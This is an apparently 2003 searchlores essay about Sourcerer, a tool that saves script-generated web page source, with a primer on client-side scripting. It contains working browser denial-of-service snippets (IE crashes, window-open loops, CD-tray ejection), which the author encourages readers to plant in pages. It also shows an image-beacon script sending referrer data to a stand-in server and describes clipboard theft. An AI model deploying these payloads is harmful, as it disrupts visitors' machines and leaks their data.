An html protection 'Wizzard' after having taken his dried frog pills :)
~ Sourcerer ~
Javascript protections busting

v 0.1 May 2003 by Mordred





This file is a part of the sourcerer package. To find the original essays and packages @ searchlores, use namazu.

Overview

The Sourcerer allows you to save the source of those annoying web sites that use JavaScript to generate content. Ordinary browsers can save only the original source, not what the scripts generate from it. For example, let's suppose you have a page which says:

<SCRIPT language=javascript><!--
document.write("Hello world");//-->
</SCRIPT>

In your browser you will see only the text "Hello world", but if you save the page's source, you will see only this piece of script. Because of this, some really bad people (you may think it's just funny, but, well, it's not) decided they could make money on the backs of others by selling them stupid "HTML protection" software, which is more or less a piece of JavaScript that decodes the actual source on the fly.
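To make the trick concrete, here is a minimal sketch of how such a "protection" might work. It is not taken from any real product: protect and reveal are hypothetical names, and the use of escape/unescape as the "encryption" is an assumption (commercial protectors may use other encodings, but the principle is the same).

```javascript
// Hypothetical "protector": hides the HTML inside a percent-encoded string.
function protect(html) {
  var encoded = escape(html); // legacy global function, encodes <, >, spaces, quotes...
  return '<SCRIPT language=javascript><!--\n' +
         'document.write(unescape("' + encoded + '"));//-->\n' +
         '</SCRIPT>';
}

// Stand-in for what the browser does when it runs the protected page:
// decode the string and hand the result to document.write.
function reveal(protectedPage) {
  var match = /unescape\("([^"]*)"\)/.exec(protectedPage);
  return match ? unescape(match[1]) : null;
}

var page = protect('<b>Hello world</b>');
console.log(page);         // what "View source" shows
console.log(reveal(page)); // what the browser actually renders
```

The point is that the decoder has to ship together with the encoded page, otherwise the browser could not display it. Anything the browser can decode, you can decode too.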

Here's what we do. Go to http://www.blmodirect.com/letters/b5012protected.htm (or try the local copy provided in the package if that one is down). Right-click on the browser window, and choose "View source". Mm, yeah ... tons of crap. Now open the same URL in Sourcerer (copy & paste the URL - that's the only way, and the fastest one anyway, so get used to it). Choose Save source and open the result in your text editor. That's about how you use Sourcerer. If you're playing at +Mala's, don't forget to try it on the third riddle :)

If you have a large collection of files to convert (you downloaded them with wget of course, certainly NOT by hand), you can automate their conversion using the command line:

Sourcerer.exe "file://localhost/c:/dir with spaces/index.html" c:\no_spaces_therefore_no_quotes\1.html
Sourcerer.exe http://www.searchlores.org index.htm
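For a whole directory of downloaded files you would generate such lines rather than type them. A rough sketch follows, assuming only the "Sourcerer.exe source destination" form shown above; the helper names, the second input path and the numbered output names are made up for illustration.

```javascript
// Turn a Windows path into the file://localhost/ form used in the example above.
function toFileUrl(winPath) {
  return "file://localhost/" + winPath.replace(/\\/g, "/");
}

// Quote an argument only when it contains whitespace.
function quoteIfNeeded(arg) {
  return /\s/.test(arg) ? '"' + arg + '"' : arg;
}

// Build one Sourcerer command line per input file; outputs are numbered 1.html, 2.html, ...
function buildCommands(inputFiles, outputDir) {
  return inputFiles.map(function (file, i) {
    var output = outputDir + "\\" + (i + 1) + ".html";
    return ["Sourcerer.exe", quoteIfNeeded(toFileUrl(file)), quoteIfNeeded(output)].join(" ");
  });
}

var commands = buildCommands(
  ["c:\\dir with spaces\\index.html", "c:\\mirror\\page2.html"],
  "c:\\no_spaces_therefore_no_quotes"
);
console.log(commands.join("\r\n")); // paste the result into a .bat file
```

The script only prints the commands, it does not run them, so you can check the list before letting it loose on your collection.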

IMPORTANT! Please, use your brain. Sourcerer uses an IE WebBrowser control, which means that it is effectively an IE copy. Don't use it for browsing, or you'll get hacked, spammed, flooded or made to look stupid in any other way. Proof? (Btw, do copy these snippets into your html pages to annoy the bozos that use IE, or better, find fresh ones, or learn to write such scripts on your own.)

<input type crash>
Crashes IE, details
<object ID=crash CLASSID='CLSID:00022613-0000-0000-C000-000000000046'> </object>
Crashes IE, details
<script>while(1)w=window.open('','')</script>
Opens windows in a loop, not a major pain in the ass as there is a limit to the number of windows, and the IEXPLORE task can be easily killed
<script>while(1) {
	alert('1');
	document.write("<script>while(1)w=window.open('','')</sc"+"ript>")}
</script>
Improved example: not so easily killed
<SCRIPT LANGUAGE="VBScript"><!--
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
        For i = 0 to colCDROMs.Count - 1
                colCDROMs.Item(i).Eject
        Next 
End If
--></SCRIPT>
And one for comic relief - eject your cd tray

Note that these snippets will work without any user interaction whatsoever; the examples here require a button push so you can read the article, duh :) Also, I haven't tested them under many OS/browser combinations, so on your system they may behave differently.

Scripting overview

There are more thorough papers on the subject for the interested reader, so this section is aimed at non-coding seekers and will therefore be kept as low-tech as possible.

The most important thing to know is that HTML scripting is something that happens on YOUR side of the user-internet duet (as opposed to CGI or server-side scripting, which happens on a server). It is also called client-side scripting. The scripts are programs, which are interpreted (i.e. translated into machine-understandable code) and run by your browser.

These little programs can do a lot of things (which some people may consider useful), but are mainly designed to change or add to the content of the HTML document, for example by printing the current time and date. This means that the page source, which your browser downloads from the remote server, will be one and the same, but still you will see different text each time. Browse to www.searchlores.org with and without JavaScript and see the difference.
1)<SCRIPT LANGUAGE="JavaScript">
2)	document.write("<I>Updated </I>");
3)	document.write("<font color=black>");
4)	document.write(UpdateDate(5,7,2003)); 
5)	document.write("</font></i>");
6)</script>
Let's follow what it does:
The 1) and 6) tags mark a piece of HTML which is a script. If the browser does not support or accept scripting, the contents will be ignored. The "language" attribute tells us (and more importantly - tells the browser) that this is JavaScript. The 2), 3) and 5) lines print some text to the HTML document, which is the same as if the text were directly included in the HTML, while 4) does something more interesting - it calls a function (a subroutine; a small piece of code, defined elsewhere, to do a routine job) - which prints the number of days since the date specified by the three numbers (month, day, year).
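The body of UpdateDate is not shown here, so the following is only a guess at what such a function could look like. updateDateSketch, daysSince, the extra "now" parameter and the wording of the output are all assumptions, not the site's actual code.

```javascript
// Whole days between the given calendar date and "now".
function daysSince(month, day, year, now) {
  var msPerDay = 24 * 60 * 60 * 1000;
  // Compare UTC midnights so daylight-saving shifts do not skew the count.
  var then = Date.UTC(year, month - 1, day); // JavaScript months are 0-based
  var today = Date.UTC(now.getFullYear(), now.getMonth(), now.getDate());
  return Math.round((today - then) / msPerDay);
}

// Hypothetical stand-in for UpdateDate(month, day, year).
// "now" is optional and exists only to make the sketch testable.
function updateDateSketch(month, day, year, now) {
  var days = daysSince(month, day, year, now || new Date());
  return days === 0 ? "today" : days + " day(s) ago";
}

// Pretend it is 17 May 2003:
console.log(updateDateSketch(5, 7, 2003, new Date(2003, 4, 17))); // 10 day(s) ago
```

On a real page the result would be passed to document.write, exactly as in line 4) above, so the text changes every day while the downloaded source stays the same.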

Note that since the user agents ('browsers') of the current search engines do not interpret scripts, any text written by such means will be visible only to the human reader. For example, compare site:searchlores.org searching with site:searchlores.org updated

Each scripting language (JavaScript, VBScript, JScript) has its own syntactical rules, which are not the subject of this article, and you should normally not worry about them. We can also consider Java and Flash ActionScript as such scripting languages (although they are precompiled instead of being interpreted on the fly, but this difference is of no importance here), because they too are executed on the client side. All these languages were designed to be 'secure' in the sense that they cannot (rather SHOULD not) read or write files on the user's machine, execute local commands, etc. The sad thing is that exploits are continuously found, which exploit bugs in the scripting system, allowing anything from slight annoyances (like opening all your CD trays at once) to serious security breaches (full read/write/execute access to the victim's machine). That's why common sense dictates that we browse with scripting turned off (no matter what browser we use).

Besides exploits, which are abnormal behaviour of the scripting system, its normal behaviour has some uncanny features too. Being integrated with your browser, JavaScript for example knows WHAT kind of browser it is, what your OS is, your screen resolution, color-depth, browser history and even the contents of your clipboard! You may think that this is okay, since it's executed only on your machine, but it's not, since you can do something like this:
<script language=javascript>
	document.write("<img src='http://myserver.com/my_fake_image_script.gif?" + escape(document.referrer) + "'>");
</script>
This means that we include in the page's source an image tag, and the image source we provide is in fact a masqueraded SERVER-SIDE script, which, when your browser blindly goes to download that image, will receive the referring URL. Or the screen width. Or the clipboard. Or you can make the page periodically check (while it is active) if there's something new in the clipboard and send it to your server. Do you copy and paste your passwords?
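A slightly more general sketch of the same trick, so you know what to look for when reading a page's scripts. buildBeaconUrl and the parameter names ref and w are invented for illustration; in a browser the values would come from document.referrer, screen.width and the like.

```javascript
// Build the URL of the fake "image" that smuggles data to the server.
function buildBeaconUrl(scriptUrl, data) {
  var pairs = [];
  for (var key in data) {
    if (Object.prototype.hasOwnProperty.call(data, key)) {
      // Encode both names and values so they survive inside a query string.
      pairs.push(encodeURIComponent(key) + "=" + encodeURIComponent(String(data[key])));
    }
  }
  return scriptUrl + "?" + pairs.join("&");
}

// Sample values standing in for what the browser would report.
var url = buildBeaconUrl("http://myserver.com/my_fake_image_script.gif", {
  ref: "http://example.com/a page?x=1",
  w: 1024
});
console.log(url);
```

Whatever ends up after the "?" lands in the server's logs the moment the browser requests the "image", with no further code needed on the page.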

Btw Opera users are not much more immune to these tricks, as even with image loading turned off, some images can be loaded through CSS or JavaScript. The paranoid to the bone should use wget with the --page-requisites option, with faked referrer and user-agent fields, through a secure proxy, to download the page they want to view. Then disconnect from the internet, manually check each file for suspicious code (did you know that in the past Netscape Navigator would execute javascript hidden in GIF comments?), render the page through Sourcerer, manually cut the remaining scripts, and then hope that the browser will not be crashed by the latest strange exploit. It's not an easy life, being paranoid :) Yeah, well, just turn off JavaScript, okay?

Finale

The sources are included in the package, do whatever you want with them, I don't care. To save the curious their precious time, the essence of this program is this snippet:
		Dim doc As HTMLDocument
		Set doc = Browser.Document
		...
		s = doc.documentElement.outerHTML



(c) 1952-2032: [fravia+], all rights reserved